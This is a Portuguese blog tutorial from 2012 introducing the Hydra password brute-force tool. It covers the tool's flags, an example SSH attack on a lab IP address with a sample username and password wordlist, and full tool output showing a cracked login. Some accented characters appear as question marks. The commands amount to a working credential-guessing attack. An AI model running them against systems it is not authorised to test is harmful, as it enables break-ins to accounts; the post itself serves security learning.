Get the Flash Player to see this player.
Logo Design by
Logo Design by FlamingText.com

quarta-feira, 3 de outubro de 2012

Introdu��o ao Hydra - Brute-force

Basicamente, o Hydra descobre senha atrav?s de brute-force (tentativa e erro), ele busca em wordlists, poss?veis usu?rios/senhas e vai testando as combina??es, uma a uma.

O Hydra tem suporte aos servi?os Telnet, Formul?rio HTTP/HTTPS, SSH, MySQL, PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros.

A ferramenta j? vem toda instalada e configurada (inclusive com interface gr?fica) no BackTrack, por?m, caso n?o tenha instalado, basta fazer o download do c?digo-fonte e compil?-la em qualquer distribui??o.

Para isso, acesse: http://www.thc.org/thc-hydra

Abaixo, segue alguns par?metros: -R ? Restaura sess?es abordadas/quebradas. -S ? Conex?o segura usando SSL caso seja necess?rio. -s ? Especifica em qual porta o Hydra vai estabelecer a conex?o.
Sintaxe:

# hydra ?l username ?p password ?t threads IP protocol
# hydra -L lista -P lista -t threads IP protocol

Explica??o: -l ? Nome/login da v?tima; -L ? Carrega uma lista contendo nomes/logins de v?timas (1 por linha); -p ? Especifica senha ?nica; -P ? Carrega uma lista com senhas (1 por linha); -e ? Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass; -C ? Usado para carregar um arquivo contendo usu?rio:senha. Formato usu?rio:senha equivale a - L/-P; -M ? Carrega lista de servidores alvos (1 por linha); -o ? Salva as senhas encontradas dentro do arquivo que voc? especificar; -f ? Faz o programa parar de trabalhar quando a senha ou usu?rio for encontrada[o]; -t ? Limita o numero de solicita??es por vez (default: 16); -w ? Define o tempo m?ximo em segundos para esperar resposta do servidor (default: 30s); -v / -V ? Modo verbose do programa. 'V' mostra todas tentativas.
Abaixo, segue um exemplo com o protocolo SSH:

# hydra ?L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh

Ele ir? efetuar um brute-force com usu?rios presentes na lista e com as senhas presentes na lista "wordlist.txt", no servidor cujo IP ?: 192.168.0.101

Bom, abaixo segue um cat do meu "wordlist.txt":

# cat wordlist.txt

darlan
hugo
diogo
danilo
paula
rosi
1234
mudar1234
P@ssw0rd
coracao
teste
teste123
root
root123
tux123
123tux

Sa?da do Hydra:

# hydra -L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-03 15:17:16
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 servers, 256 login tries (l:16/p:16), ~16 tries per task
[DATA] attacking service ssh on port 22
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
[22][ssh] host: 192.168.0.101 login: darlan password: tux123      //AQUI EST?!
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting

Repare que ele testa v?rias combina??es e retorna Timeout, quando n?o consegue fechar a autentica??o.

Por?m, quando consegue, ele retorna:

[porta][protocolo] host: IP login: "login correto" password: "senha correta"
[22][ssh] host: 192.168.0.101    login: darlan    password: tux123

Bom, esta foi apenas um introdu??o.
Um abra?o a todos. :)

Dica previamente publicada em:


View the original article here

Postado por às
Marcadores: , ,

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)